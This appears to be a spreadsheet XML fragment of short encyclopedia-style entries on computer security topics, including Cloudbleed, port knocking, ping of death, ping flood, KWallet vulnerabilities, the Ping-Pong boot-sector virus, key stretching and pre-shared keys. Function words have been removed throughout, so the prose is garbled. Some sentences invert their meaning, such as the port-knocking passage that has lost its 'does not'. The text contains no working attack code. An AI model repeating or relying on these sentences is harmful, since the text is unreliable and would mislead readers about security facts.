hackers inject malicious code forged content browsers visitors. attacks worked implementation used affected servers incorrectly reused random numbers (nonces) intended used once, ensuring handshake unique.in february 2017, implementation error caused single mistyped character code used parse html created buffer overflow error cloudflare servers. similar effects heartbleed discovered 2014, overflow error, widely known cloudbleed, allowed unauthorized third parties read data memory programs running servers—data otherwise protected tls. survey websites vulnerable attacks july 2021, trustworthy internet movement estimated ratio websites vulnerable attacks. forward secrecy forward secrecy property cryptographic systems ensures session derived public private keys compromised private keys compromised future. without for</t>
  </si>
  <si>
    <t>Semantic error</t>
  </si>
  <si>
    <t>computer programming, logic error program causes operate incorrectly, terminate abnormally crash). logic error produces unintended undesired output behaviour, although immediately recognized such. logic errors occur compiled interpreted languages. unlike program syntax error, program logic error valid program language, though behave intended. often clue existence logic errors production wrong solutions, though static analysis sometimes spot them. debugging logic errors ways find type error program's variables file screen order determine error's location code. although work cases, example calling wrong subroutine, easiest find problem program uses incorrect results mathematical calculation. examples this example function calculate average numbers contains logic error. missing parentheses calculation, compiles runs give expected answer operator precedence (division evaluated addition). also syntax error off-by-one error</t>
  </si>
  <si>
    <t>LaserLock</t>
  </si>
  <si>
    <t>laserlock copy restriction system cd-roms 32-bit windows applications introduced laserlock international inc. 1995. laserlock supposed check whether original storage medium program inserted. this check done regularly installation program. disk accessible, error window displayed. uses combination encryption software optical mark surface disk. protection code embedded executable file disk using proprietary tool. this file, responsible searching physical mark disk, encrypted gets multiple layers protection code analysis impede reverse engineering. size encrypted file varies cd-roms dvd-roms occasionally laserlock includes hidden directory disk contains corrupted data. when disk copied, read device encounters errors hidden directory. copying leads unstable behavior copied software often sectors make impossible without original disk. notes also official</t>
  </si>
  <si>
    <t>Security bug</t>
  </si>
  <si>
    <t>security security defect software exploited gain unauthorized access privileges computer system. security bugs introduce security vulnerabilities compromising authentication users entities authorization access rights privileges data confidentiality data integritysecurity bugs need identified exploited qualified assumed much common known vulnerabilities almost system. causes security bugs, like software bugs, stem root causes generally traced either absent inadequate: software developer training case analysis software engineering methodology quality assurance testing best practices taxonomy security bugs generally fall fairly small number broad categories include: memory safety (e.g. buffer overflow dangling pointer bugs) race condition secure input output handling faulty improper case handling improper exception handling resource leaks, often always improper exception handling preprocessing input strings checked acceptable mitigation software security assurance. also computer security hacking: exploitation second edition risk threat (computer) vulnerability (computing) hardware secure coding references further reading open application security project august 2015). "2013 list". "cwe/sans most dangerous software errors". sans. retrieved july 2012.</t>
  </si>
  <si>
    <t>Joe-E</t>
  </si>
  <si>
    <t>joe-e subset java programming language intended support programming according object-capability discipline.the language notable early object-capability subset language. influenced later subset languages, adsafe caja/cajita, subsets javascript. also notable allowing methods verified functionally pure, based method signatures.the restrictions imposed joe-e verifier include: classes mutable static fields, create global state. catching out-of-memory exceptions prohibited, allows non-deterministic execution. reason, finally clauses allowed. methods standard library blocked deemed unsafe according taming rules. example, constructor file(filename) blocked allows unrestricted access filesystem.cup slang coffee, serves trademark-avoiding reference java. thus, name joe-e intended suggest adaptation ideas programming language create variant java language. waterken server written joe-e. references external links joe-e project google code joe-e language specification</t>
  </si>
  <si>
    <t>Port knocking</t>
  </si>
  <si>
    <t>computer networking, port knocking method externally opening ports firewall generating connection attempt prespecified closed ports. once correct sequence connection attempts received, firewall rules dynamically modified allow host sent connection attempts connect specific port(s). variant called single packet authorization (spa) exists, single "knock" needed, consisting encrypted packet.the primary purpose port knocking prevent attacker scanning system potentially exploitable services port scan, unless attacker sends correct knock sequence, protected ports appear closed. overview port knocking usually implemented configuring daemon watch firewall file connection attempts certain points, modify firewall configuration accordingly. also performed kernel level (using kernel-level packet filter iptables) userspace process examining packets higher level (using packet capture interfaces pcap), allowing already "open" ports used within knock sequence. port "knock" similar secret handshake consist number tcp, even sometimes icmp protocol packets numbered ports destination machine. complexity knock anything simple ordered list (e.g. port 1000, port 2000, port 3000) complex time-dependent, source-ip-based other-factor-based encrypted hash. portknock daemon firewall machine listens packets certain ports (either firewall packet capture). client user would carry extra utility, could simple netcat modified ping program complicated full hash-generator, attempted connect machine usual way. most portknocks stateful systems first part "knock" received successfully, incorrect second part would allow remote user continue and, indeed, would give remote user clue sequence failed. usually indication failure that, knock sequence, port expected open opened. packets sent remote user time. while technique securing access remote network daemons widely adopted security community, actively used many rootkits even year 2000. benefits defeating port knocking protection requires large-scale brute force attacks order discover even simple sequences. anonymous brute force attack three-knock sequence (e.g. port 1000, 2000, 3000) would require attacker test every three port combination 1–65535 range scan port attacks uncover changes port access target system. since port knocking definition stateful, requested port would open correct three-port number sequence received correct order without receiving intervening packets source. average case scenario requires approximately trillion (655353 packets determine correct three-port number. this technique, combination knock attempt-limiting, longer complex sequences cryptographic hashes, makes successful port access attempts extremely difficult. once successful port knock sequence supplied open port, firewall rules generally open port address supplied correct knock, adding dynamic functionality firewall behaviour. instead using preconfigured static whitelist firewall, authorised user situated anywhere world would able open necessary port without assistance server administrator. system could also configured allow authenticated user manually close port session close automatically using timeout mechanism. establish session, remote user would required reauthenticate using correct sequence. stateful behaviour port knocking allows several users different source addresses varying levels port knock authentication simultaneously, allowing legitimate user correct knock sequence firewall firewall middle port attack multiple addresses (assuming bandwidth firewall completely consumed). from attacking address, ports firewall still appear closed. using cryptographic hashes inside port knock sequence defends packet sniffing source target machines, preventing discovery port knock sequence using information create traffic replay attacks repeat prior port knock sequences. port knocking used part defense depth strategy. even attacker successfully gain port access, port security mechanisms still place, along assigned service authentication mechanisms opened ports. implementation technique straightforward, using bare minimum shell script server windows batch file command line utility client. overhead server client terms traffic, memory consumption minimal. port knock daemons complex code; type vulnerability within code obvious auditable. port knock system implemented ports sidesteps issue brute force password attacks logins. case ssh, daemon activated without correct port knock, attack filtered tcp/ip stack rather using authentication resources. attacker, daemon inaccessible correct port knock supplied. security considerations port knocking flexible, customisable system add-in. administrator chooses link knock sequence activity running shell script, changes implementing additional firewall rules open ports specific addresses easily incorporated script. simultaneous sessions easily accommodated. using strategies like dynamic length pool length reduce probability hacking knock sequences near zero.in addition mitigating brute force password attacks inevitable growth logs associated process daemon, port knocking also protects protocol vulnerability exploits. exploit discovered could compromise daemon default configuration, using port knocking listening port reduces possibility compromise software process updated. authorized users would continue served provide correct knock sequence random access attempts would ignored. port knocking viewed part overall network defense strategy providing protection random targeted attacks, complete standalone solution. network security professionals largely ignored port knocking solution past since early implementations relied solely providing correct port combinations achieve access. modern port knock systems incorporate features secure cryptographic hashes, blacklists, whitelists dynamic attack responses increase system capability. port knocking effective means maximizing server resources internet facing networks.properly implemented port knocking lower overall security system. effective measure provides additional layer security minimal server resource overhead. worst, systems port knocking introduce security issues poor implementation expose ambivalent administration attitudes situations risk compensation. disadvantages port knocking totally dependent robustness port knocking daemon. failure daemon deny port access users usability security perspective, undesirable single point failure. modern port knocking implementations mitigate issue providing process-monitoring daemon restart failed stalled port knocking daemon process. systems cryptographic hashes vulnerable address spoofing attacks. these attacks, form denial service, port knocking functionality lock known addresses (e.g. administrator management stations) sending packets spoofed address random ports. servers using static addressing especially vulnerable types denials service addresses well known. port knocking problematic networks exhibiting high latency. port knocking depends packets arriving correct sequence access designed functionality. tcp/ip, hand, designed function assembling order packets coherent message. situations, solution client continue resending correct sequence packets periodic basis sequence acknowledged server. port knocking cannot used sole authentication mechanism server. from security perspective, simple port knocking relies security obscurity; unintended publication knock sequence infers compromise devices supporting sequence. furthermore, unencrypted port knocking vulnerable packet sniffing. network trace suitable length detect correct knock sequence single address thus provide mechanism unauthorised access server extension, attached network. once compromised, files device source valid knock sequences, revealing another point failure. solutions treating knock sequence one-time password defeat simplified administration. practice, port knocking must combined forms authentication vulnerable replay man-in-the-middle attacks whole system effective. references external links silentknock: practical, provably undetectable authentication analysis port knocking single packet authorization" thesis sebastien jeanquier "implementing port knocking system honors thesis matt doyle. list resources (papers, implementations, presentations...) portknocking system stealthy authentication across closed ports. (archived) linux journal: port knocking (2003) critique port knocking (2004) fwknop: implementation combines port knocking passive fingerprinting webknock: online port knocking single packet authorization (spa) client based fwknop webknocking: using webpages instead ports. port knocking hide backdoor port knocking hide communication channel malware, example wild techniques lightweight concealment authentication networks (2002)</t>
  </si>
  <si>
    <t>Ping of death</t>
  </si>
  <si>
    <t>ping death type attack computer system involves sending malformed otherwise malicious ping computer. correctly formed ping packet typically bytes size, bytes internet control message protocol (icmp) header considered, bytes including internet protocol (ip) version header. however, ipv4 packet (including pings) large 65,535 bytes. some computer systems never designed properly handle ping packet larger maximum packet size violates internet protocol. like large well-formed packets, ping death fragmented groups octets transmission. however, target computer reassembles malformed packet, buffer overflow occur, causing system crash potentially allowing injection malicious code. early implementations tcp/ip, easy exploit affect wide variety systems including unix, linux, mac, windows, peripheral devices. systems began filtering pings death firewalls detection methods, different kind ping attack known ping flooding later appeared, floods victim many ping requests normal traffic fails reach system basic denial-of-service attack). detailed information maximum packet length ipv4 packet including header 65,535 (216 bytes, limitation presented 16-bit wide header field describes total packet length. underlying data link layer almost always poses limits maximum frame size (see mtu). ethernet, typically 1500 bytes. case, large packet split across multiple packets (also known fragments), fragment match imposed limit. receiver fragments reassemble complete packet continue processing usual. when fragmentation performed, fragment needs carry information part original packet contains. this information kept fragment offset field, header. field bits long, contains offset data current fragment, original packet. offset given units bytes. this allows maximum offset 65,528 ((213-1)*8). then adding bytes header, maximum 65,548 bytes, exceeds maximum frame size. this means fragment maximum offset data larger bytes, else would exceed limit maximum packet length. malicious user send fragment maximum offset much data bytes large physical layer allows be). when receiver assembles fragments, packet larger 65,535 bytes. this possibly overflow memory buffers receiver allocated packet, cause various problems. evident description above, problem nothing icmp, used payload, enough exploit problem. problem reassembly process fragments, contain type protocol (tcp, udp, igmp, etc.). correction problem checks reassembly process. check incoming fragment makes sure "fragment offset" "total length" fields header fragment smaller equal 65,535. greater, packet invalid, fragment ignored. this check performed firewalls, protect hosts fixed. another problem using memory buffer larger 65,535 bytes re-assembly packet. (this essentially breaking specification, since adds support packets larger allowed.) ping death ipv6 2013, ipv6 version ping death vulnerability discovered microsoft windows. windows tcp/ip stack handle memory allocation correctly processing incoming malformed icmpv6 packets, could cause remote denial service. this vulnerability fixed ms13-065 august 2013. cve-id vulnerability cve-2013-3183. 2020, another (cve-2020-16898) icmpv6 found around router advertisement, could even lead remote code execution. also invite death land ping flood redos smurf attack references external links ping death page wayback machine (archived december 1998) ping death insecure.org</t>
  </si>
  <si>
    <t>KWallet</t>
  </si>
  <si>
    <t>wallet manager (kwallet) free open-source password management software written unix-style operating systems. wallet manager runs linux-based main feature storing encrypted passwords wallets. main feature wallet manager (kwallet) collect user's credentials passwords encrypt blowfish symmetric block cipher algorithm privacy guard encryption. installation wallet manager (kwallet) requires linux-based software compilation desktop environment kubuntu. browser extensions wallet manager (kwallet) integrated various browsers including chrome, firefox, opera, edge. wallet manager (kwallet) intergration goole chrome chromium, user needs program argument --password-store=kwallet5 --password-store=detect standalone add-on also available firefox. this addon allows users store passwords internally wallet manager (kwallet) instead default firefox password manager. konqueror, official browser desktop environment (kde) features wallet manager (kwallet) store sensitive passwords encrypted. example code retrieve data kwallet wallet manager’s apis trigger authentication events application makes request desktop communications protocol (dcop), kde’s primary interprocess communication (ipc) mechanism, causes password dialog displayed application. this causes password dialog launched daemon process. users choose either cancel dialog terminate application fill password password filled, wallet automatically open. wallet manager’s desktop communications protocol (dcop) accessed locally interprocess communication (ipc) protocol processed unix local sockets. wallet manager’s gui, users manage every wallet password assigned them. wallet manager allows users save delete wallets users identify wallet applications look attempting access stored password.these lists actions users take wallet manager (kwallet): create wallet change default wallet lock wallet store passwords wallet unlock password wallet update information wallet view stored passwords wallet wallets wallet term password storage used wallet manager software. wallets created manually user offered dialogue user enters password desktop environment website. once created, wallet store various passwords controlled master password. this users remember various passwords, instead, manage memorizing master password wallet. default wallet named “kdewallet” users create needed. managing wallets users manage wallets wallet manager window. packaging combining wallets done dragging dropping. user wants export information locations flash drives, window allows user choose whether export data encrypted not. providing master password, user similarly import data encrypted. setting preference wallets also possible, user certain wallets default wallet. close wallet setting enables user close wallet after: close unused close screensaver starts close application stops using encryption password data stored wallet manager encrypted major ways. privacy guard (gnupg gpg) algorithm used gnupg made easy library installed user’s linux-based not, blowfish symmetric block cipher algorithm used. blowfish symmetric block cipher algorithm wallet manager encrypts data stored wallet using blowfish symmetric block cipher algorithm mode. protect user’s information, blowfish encrypted data authenticated sha-1 hashing algorithm. wallet manager’s blowfish encryption provides faster encryption compared khufu, rc5, des, idea, trip-des. blowfish encrypts rate clock cycles byte 32-bit microprocessors. wallet manager’s blowfish algorithm executed memory within simple structure easy implement easy determine strength algorithm. algorithm variable length, long bites allows basic word addition operations. privacy guard encryption users create privacy guard (gnupg gpg) based wallet store extra-sensitive passwords. this requires users install gnupg made easy library. library installed software found privacy guard (gnupg gpg), users asked choose wallet. user stil encrypt passwords blowfish symmetric block cipher algorithm since privacy guard encrtpytion library includes dsa/blowfish symmetric block cipher algorithm. security wallet manager using wallet manager (kwallet) ease management passwords provide greater security conditions user's system. instead getting user's passwords, attackers master password user's wallets user's since directory encrypted files wallet manager (kwallet) located predictable files, might vulnerable viruses worms programmed password management system itself. known vulnerabilities sha-1 hash function used wallet manager (kwallet) cryptographically broken. google amsterdam proved identical sha-1 digest displays different content. various companies including microsoft discontinued sha-1 supports however wallet manager (kwallet) uses sha512 versions higher 4.13 pluggable authentication module uses sha-1 hash function. "kwallet-pam kwallet 5.12.6 allows local users obtain ownership arbitrary files symlink attack." "fishprotocol::establishconnection fish/fish.cpp kio-extras 20.04.0 makes cacheauthentication call even user keeppassword option. this lead unintended kwallet storage password." "kwalletd kwallet applications 14.12.0 uses blowfish mode instead mode encrypting password store, makes easier attackers guess passwords codebook attack." "sha-1 collision resistant, makes easier context-dependent attackers conduct spoofing attacks, demonstrated attacks sha-1 1.2. note: exists provide common identifier referencing sha-1 issue; existence identifier not, itself, technology recommendation." issue discovered password-store.sh pass simple password store 1.7.x 1.7.2. signature verification routine parses output gnupg incomplete regular expression, allows remote attackers spoof file signatures configuration files extension scripts. modifying configuration file allows attacker inject additional encryption keys control, thereby disclosing passwords attacker. modifying extension scripts allows attacker arbitrary code execution." "gnupg 2.2.21 2.2.22 (and gpg4win 3.1.12) array overflow, leading crash possibly unspecified impact, victim imports attacker's openpgp key, aead preferences. overflow caused g10/key-check.c error. note: gnupg 2.3.x unaffected. gnupg 2.2.23 fixed version." flaw found certificate signatures could forged using collisions found sha-1 algorithm. attacker could weakness create forged certificate signatures. this issue affects gnupg versions 2.2.18." "gnupg 1.4.16 generates keys using sequences introductions certain patterns introduce side channel, allows physically proximate attackers extract keys chosen-ciphertext attack acoustic cryptanalysis decryption. note: applications typically expected protect acoustic side-channel attacks, since arguably responsibility physical device. accordingly, issues type would normally receive identifier. however, issue, developer specified security policy gnupg offer side-channel resistance, developer-specified security-policy violations within scope cve." "integer underflow ksba_oid_to_str function libksba 1.3.2, used gnupg, allows remote attackers cause denial service (crash) crafted s/mime message based openpgp data, triggers buffer overflow." "use-after-free vulnerability kbx/keybox-blob.c gpgsm gnupg 2.0.16 allows remote attackers cause denial service (crash) possibly execute arbitrary code certificate large number subject alternate names, properly handled realloc operation importing certificate verifying signature." "mainproc.c gnupg 2.2.8 mishandles original filename decryption verification actions, allows remote attackers spoof output gnupg sends file descriptor programs "--status-fd option. example, openpgp data might represent original filename contains line feed characters conjunction goodsig validsig status codes." "the integrity check feature openpgp, handling message encrypted using cipher feedback (cfb) mode, allows remote attackers recover part plaintext chosen-ciphertext attack first bytes message block known, oracle mechanism available determine whether integrity check failed." "heap-based buffer overflow ask_outfile_name function openfile.c gnupg (gpg) 2.0, running interactively, might allow attackers execute arbitrary code messages "c-escape" expansions, cause make_printable_string function return longer string expected constructing prompt." "gnupg 1.4.6 earlier gpgme 1.1.4, command line, visually distinguish signed unsigned portions openpgp messages multiple components, might allow remote attackers forge contents message without detection." "mainproc.c gnupg 2.2.8 mishandles original filename decryption verification actions, allows remote attackers spoof output gnupg sends file descriptor programs "--status-fd option. example, openpgp data might represent original filename contains line feed characters conjunction goodsig validsig status codes." "the mixing functions random number generator libgcrypt 1.5.6, 1.6.x 1.6.6, 1.7.x 1.7.3 gnupg 1.4.21 make easier attackers obtain values bits leveraging knowledge previous 4640 bits." "kbx/keybox-search.c gnupg 1.4.19, 2.0.x 2.0.27, 2.1.x 2.1.2 properly handle bitwise left-shifts, allows remote attackers cause denial service (invalid read operation) crafted keyring file, related sign extensions "memcpy overlapping ranges." notes reference</t>
  </si>
  <si>
    <t>Security Attribute Modulation Protocol</t>
  </si>
  <si>
    <t>security attribute modulation protocol (samp) protocol used encode role based user based access control attributes transmission network, typically embedded tcp/ip udp/ip packet, application layer payload trailing afterwards. microsystems makes brief mention samp trusted solaris administration manuals. case trusted solaris trusted network daemon parses samp headers manages system security conjunction security provisions system.</t>
  </si>
  <si>
    <t>Ping-Pong virus</t>
  </si>
  <si>
    <t>ping-pong virus (also called boot, bouncing ball, bouncing dot, italian, italian-a veracruz) boot sector virus discovered march 1988, politecnico torino (turin polytechnic university) italy. likely common best known boot sector virus outnumbered stoned virus. replication method computers could contaminated infected diskette, showing cluster (the last disk, used virus store original boot sector) disk checking programs. labelled cluster, ms-dos avoid overwriting infects disks every active drive even infect non-bootable partitions hard disk. upon infection, virus becomes memory resident. effect virus would become active disk access made exactly half-hour start show small "ball" bouncing around screen text mode (the ascii bullet character "•") graphical mode. serious damage incurred virus except '286 machines (and also v20, '386 '486), would sometimes crash ball's appearance screen. cause crash "mov cs,ax" instruction, exists processors. reason, users machines risk advised save work reboot, since temporarily virus. original ping pong virus (ping-pong.a) infects floppy disks. later variants virus ping-pong.b ping-pong.c also infect hard disk boot sector well. while virus active, cannot replace boot sector—it either prevents writing immediately re-infects ping-pong.a extinct hard-disk variants still appear. references "virus descriptions ping-pong". f-secure. retrieved june 2006. "smartdefense research center". zone labs. 2002. archived original october 2007. retrieved june 2006.</t>
  </si>
  <si>
    <t>KY-3</t>
  </si>
  <si>
    <t>ky-3 (tsec/ky-3) secure telephone system developed u.s. national security agency early 1960s. "tsec" prefix model number indicates nsa's telecommunications security nomenclature system. according information display 2002 nsa's national cryptologic museum, ky-3 provided high fidelity secure voice special wideband circuits known "4-wire dedicated drops". used executives, diplomats, military leaders intelligence community. some 2500 units produced 1965 1967 first telecommunication security devices transistors packaged functional modules. unit packaged grey relay rack cabinet. ky-3 replaced stu-i stu-ii. also stu-iii secure terminal equipment scip</t>
  </si>
  <si>
    <t>Key stretching</t>
  </si>
  <si>
    <t>cryptography, stretching techniques used make possibly weak key, typically password passphrase, secure brute-force attack increasing resources (time possibly space) takes test possible key. passwords passphrases created humans often short predictable enough allow password cracking, stretching intended make attacks difficult complicating basic step trying single password candidate. stretching also improves security real-world applications length constrained, mimicking longer length perspective brute-force attacker.there several ways perform stretching. apply cryptographic hash function block cipher repeatedly loop. example, applications used cipher, schedule cipher modified takes specific length time perform. another cryptographic hash functions large memory requirements effective frustrating attacks memory-bound adversaries. process stretching algorithms depend algorithm receives input expends considerable effort generate stretched cipher (called enhanced key) mimicking randomness longer length. algorithm must known shortcut, efficient relate input cipher repeat stretching algorithm itself. this compels brute-force attackers expend effort attempt. added effort compares brute-force search keys certain length, input described stretched length.key stretching leaves attacker options: attempt possible combinations enhanced key, infeasible enhanced sufficiently long unpredictable ⁠i.e., algorithm mimics randomness well enough attacker must trial entire stretched space) attempt possible combinations weaker initial key, potentially commencing dictionary attack initial password passphrase, attacker's added effort trial could render attack uneconomic costlier computation memory consumption outweigh expected profitif attacker uses class hardware user, guess take similar amount time process took user (for example, second). even attacker much greater computing resources user, stretching still slow attacker seriously affecting usability system legitimate user. this user's computer compute stretching function upon user entering password, whereas attacker must compute every guess attack. this process alter original key-space entropy. stretching algorithm deterministic, allowing weak input always generate enhanced key, therefore limiting enhanced possible combinations input space. consequently, attack remains vulnerable unprotected certain time-memory tradeoffs developing rainbow tables target multiple instances enhanced space parallel (effectively shortcut repeating algorithm). reason, stretching often combined salting. hash-based many libraries provide functions perform stretching part function; crypt(3) example. pbkdf2 generating encryption password, necessarily password authentication. pbkdf2 used number output bits less equal internal hashing algorithm used pbkdf2, usually sha-2 bits), used encryption encrypt static data. strength time these examples assume consumer 65,000 sha-1 hashes second. thus, program uses stretching 65,000 rounds hashes delay user second. testing trial password passphrase typically requires hash operation. stretching used, attacker must compute strengthened test, meaning 65,000 hashes compute test. this increases attacker's workload factor 65,000, approximately 216, means enhanced worth additional bits strength. moore's asserts computer speed doubles roughly every years. under assumption, every years strength plausibly brute-forcible. this implies extra bits strength worth 16×2 years later cracking, also means number stretching rounds system uses doubled every years maintain level security (since keys secure necessary, systems require consistent deterministic generation likely update number iterations used stretching. case, designer take consideration long wish derivation system unaltered choose appropriate number hashes lifespan system). cpu-bound hash functions still vulnerable hardware implementations. such implementations sha-1 exist using 5,000 gates, clock cycles. with multi-million gate fpgas costing less $100, attacker build fully unrolled hardware cracker $5,000. such design, clocked test 300,000 keys/second. attacker free choose good price/speed compromise, example 150,000 keys/second design $2,500. stretching still slows attacker situation; $5,000 design attacking straight sha-1 hash would able 300,000÷216 4.578 keys/second.similarly, modern consumer gpus speed hashing considerably. example, benchmark, nvidia 2080 super computes billion sha1 hashes second.to defend hardware approach, memory-bound cryptographic functions developed. these access large amounts memory unpredictable fashion caches ineffective. since large amounts latency memory expensive, would-be attacker significantly deterred. history first deliberately slow password-based derivation function "crypt" described 1978 robert morris encrypting unix passwords. used iteration count 12-bit salt variant sub-function. (des proper avoided attempt frustrate attacks using standard hardware.) passwords limited maximum eight ascii characters. while great advancement time, crypt(3) considered inadequate. iteration count, designed pdp-11 era, low, bits salt inconvenience stop precomputed dictionary attacks, eight-character limit prevents stronger passphrases. modern password-based derivation functions, pbkdf2, cryptographic hash, sha-2, longer salt (e.g. bits) high iteration count. u.s. national institute standards technology (nist) recommends minimum iteration count 10,000.: 5.1.1.2 "for especially critical keys, powerful systems systems user-perceived performance critical, iteration count 10,000,000 appropriate.” 2009, memory-intensive strengthening algorithm, scrypt, introduced intention limiting custom, highly parallel hardware speed testing.in 2013, password hashing competition held select improved stretching standard would resist attacks graphics processors special purpose hardware. winner, argon2, selected july 2015. some systems stretching some disk encryption software (see comparison disk encryption software): 7-zip apache .htpasswd "apr1" openssl "passwd" 1000 rounds stretching. keepass keepassxc, open-source password manager utilities. 2020, latest version uses argon2d default second stretching delay. linux unix-like systems offer shacrypt modes perform 5000 sha256 sha512 hash iterations default, minimum 1000, maximum 999,999,999. password safe open-source password manager. pgp, encryption software. default iterates hash 65536 times. wi-fi protected access (wpa wpa2) wireless encryption protocol personal mode used pbkdf2 4096 iterations. (wpa3 uses simultaneous authentication equals claims expose password hashes.) also derivation function often uses stretching pbkdf2, bcrypt, scrypt, argon2 widely used stretching algorithms hash chain references</t>
  </si>
  <si>
    <t>Key generator</t>
  </si>
  <si>
    <t>generator protocol algorithm used many cryptographic protocols generate sequence many pseudo-random characteristics. this sequence used encryption communication, decryption other. implement generator system aims generate, distribute, authenticate keys without private key, cannot access information public end.examples generators include linear-feedback shift registers (lfsr) solitaire pontifex) cipher. common examples generators would bitcoin protocol sha-256 secp256k1 algorithms used ensure funds spent moved rightful owners. significance past, people needed secure treasures physical objects, implemented locks generated unique keys owner. today, secure homes traditional locks, digital passwords, fingerprints order keep unwanted outside privacy. with rise internet, global data usage, threats privacy, started utilizing mathematical algorithms, encryption methods, automation randomness goal: generate unique keys secure data. rate global data transfer increases, generators partially virally responsible security privacy users. without efficient meaningful sense pseudo-randomness generator could harm system targeted entity(if consider lock door public key, people easily access unlocks lock private owner, could argue company generates locks initially detailed knowledge keys someone else could generate private key. thus, practical would enable user generate private without knowledge another party. references</t>
  </si>
  <si>
    <t>Ping flood</t>
  </si>
  <si>
    <t>ping flood simple denial-of-service attack attacker overwhelms victim icmp "echo request" (ping) packets. this effective using flood option ping sends icmp packets fast possible without waiting replies. most implementations ping require user privileged order specify flood option. successful attacker bandwidth victim (for instance attacker line victim dial-up modem). attacker hopes victim respond icmp "echo reply" packets, thus consuming outgoing bandwidth well incoming bandwidth. target system slow enough, possible consume enough cycles user notice significant slowdown. flood ping also used diagnostic network packet loss throughput issues. also invite death ping death smurf attack, including fraggle attack twinge attack references external links "tbtf 8/4/97: morbid taste fiber" keith dawson</t>
  </si>
  <si>
    <t>Proof-carrying code</t>
  </si>
  <si>
    <t>proof-carrying code (pcc) software mechanism allows host system verify properties application formal proof accompanies application's executable code. host system quickly verify validity proof, compare conclusions proof security policy determine whether application safe execute. this particularly useful ensuring memory safety (i.e. preventing issues like buffer overflows). proof-carrying code originally described 1996 george necula peter lee. packet filter example original publication proof-carrying code 1996 used packet filters example: user-mode application hands function written machine code kernel determines whether application interested processing particular network packet. because packet filter runs kernel mode, could compromise integrity system contains malicious code writes kernel data structures. traditional approaches problem include interpreting domain specific language packet filtering, inserting checks memory access (software fault isolation), writing filter high-level language compiled kernel run. these approaches performance disadvantages code frequently packet filter, except in-kernel compilation approach, compiles code loaded, every time executed. with proof-carrying code, kernel publishes security policy specifying properties packet filter must obey: example, access memory outside packet scratch memory area. theorem prover used show machine code satisfies policy. steps proof recorded attached machine code given kernel program loader. program loader rapidly validate proof, allowing thereafter machine code without additional checks. malicious party modifies either machine code proof, resulting proof-carrying code either invalid harmless (still satisfies security policy). also typed assembly language program derivation formal verification berkeley packet filter references george necula peter lee. proof-carrying code. technical report cmu-cs-96-165, november 1996. pages) george necula peter lee. safe, untrusted agents using proof-carrying code. mobile agents security, giovanni vigna (ed.), lecture notes computer science, vol. 1419, springer-verlag, berlin, isbn 3-540-64792-9, 1998. george necula. compiling proofs. thesis, school computer science, carnegie mellon univ., sept. 1998.</t>
  </si>
  <si>
    <t>Plaintext</t>
  </si>
  <si>
    <t>cryptography, plaintext usually means unencrypted information pending input cryptographic algorithms, usually encryption algorithms. this usually refers data transmitted stored unencrypted. overview with advent computing, term plaintext expanded beyond human-readable documents mean data, including binary files, form viewed used without requiring decryption device. information—a message, document, file, etc.—if communicated stored unencrypted form referred plaintext. plaintext used input encryption algorithm; output usually termed ciphertext, particularly algorithm cipher. codetext less often used, almost always algorithm involved actually code. some systems multiple layers encryption, output encryption algorithm becoming "plaintext" input next. secure handling insecure handling plaintext introduce weaknesses cryptosystem letting attacker bypass cryptography altogether. plaintext vulnerable storage, whether electronic paper format. physical security means securing information storage media physical, attack—for instance someone entering building access papers, storage media, computers. discarded material, disposed securely, security risk. even shredded documents erased magnetic media might reconstructed sufficient effort. plaintext stored computer file, storage media, computer components, backups must secure. sensitive data sometimes processed computers whose mass storage removable, case physical security removed disk vital. case securing computer, useful opposed handwaving) security must physical (e.g., burglary, brazen removal cover supposed repair, installation covert monitoring devices, etc.), well virtual (e.g., operating system modification, illicit network access, trojan programs). wide availability keydrives, plug modern computers store large quantities data, poses another severe security headache. (perhaps posing cleaning person) could easily conceal one, even swallow necessary. discarded computers, disk drives media also potential source plaintexts. most operating systems actually erase anything— simply mark disk space occupied deleted file 'available use', remove entry file system directory. information file deleted remains fully present overwritten later time operating system reuses disk space. with even low-end computers commonly sold many gigabytes disk space rising monthly, 'later time' months later, never. even overwriting portion disk surface occupied deleted file insufficient many cases. peter gutmann university auckland wrote celebrated 1996 paper recovery overwritten information magnetic disks; areal storage densities gotten much higher since then, sort recovery likely difficult gutmann wrote. modern hard drives automatically remap failing sectors, moving data good sectors. this process makes information failing, excluded sectors invisible file system normal applications. special software, however, still extract information them. some government agencies (e.g., nsa) require personnel physically pulverize discarded disk drives and, cases, treat chemical corrosives. this practice widespread outside government, however. garfinkel shelat (2003) analyzed second-hand hard drives acquired garage sales like, found less sufficiently sanitized. others contained wide variety readable personal confidential information. data remanence. physical loss serious problem. state department, department defense, british secret service laptops secret information, including plaintext, lost stolen. appropriate disk encryption techniques safeguard data misappropriated computers media. occasion, even data host systems encrypted, media personnel transfer data systems plaintext poorly designed data policy. example, october 2007, revenue customs lost contained unencrypted records million child benefit recipients united kingdom. modern cryptographic systems resist known plaintext even chosen plaintext attacks, entirely compromised plaintext lost stolen. older systems resisted effects plaintext data loss security less effective techniques—such padding russian copulation obscure information plaintext could easily guessed. also ciphertext red/black concept references garfinkel shelat, "remembrance data passed: study disk sanitization practices", ieee security privacy, january/february 2003 https://creativecommons.org/licenses/by-sa/3.0/ revenue customs loses records child benefit recipients kissel, richard (editor). (february, 2011). nist 7298 revision glossary information security terms (https://creativecommons.org/licenses/by-sa/3.0/). national institute standards technology.</t>
  </si>
  <si>
    <t>Pre-shared key</t>
  </si>
  <si>
    <t>cryptography, pre-shared (psk) shared secret previously shared parties using secure channel needs used. build shared secret, derivation function typically used. such systems almost always symmetric cryptographic algorithms. term used wi-fi encryption wired equivalent privacy (wep), wi-fi protected access (wpa), method called wpa-psk wpa2-psk, also extensible authentication protocol (eap), known eap-psk. cases, wireless access points (ap) clients share key.the characteristics secret determined system uses system designs require keys particular format. password, passphrase, hexadecimal string. secret used systems involved cryptographic processes used secure traffic systems. crypto systems rely keys confidentiality. particular attack always possible keys, brute force space search attack. sufficiently long, randomly chosen, resist practical brute force attack, though principle attacker sufficient computational power (see password strength password cracking discussion). unavoidably, however, pre-shared keys held parties communication, compromised end, without knowledge anyone other. there several tools available help choose strong passwords, though network connection inherently unsafe cannot general know who, anyone, eavesdropping interaction. choosing keys used cryptographic algorithms somewhat different pattern whatsoever avoided, pattern provide attacker lower effort attack brute force search. this implies random choice force attackers spend much effort possible; difficult principle practice well. general rule, software except cryptographically secure pseudorandom number generator (csprng) avoided. also transport layer security pre-shared ciphersuites (tls-psk) references</t>
  </si>
  <si>
    <t>Pre-play attack</t>
  </si>
  <si>
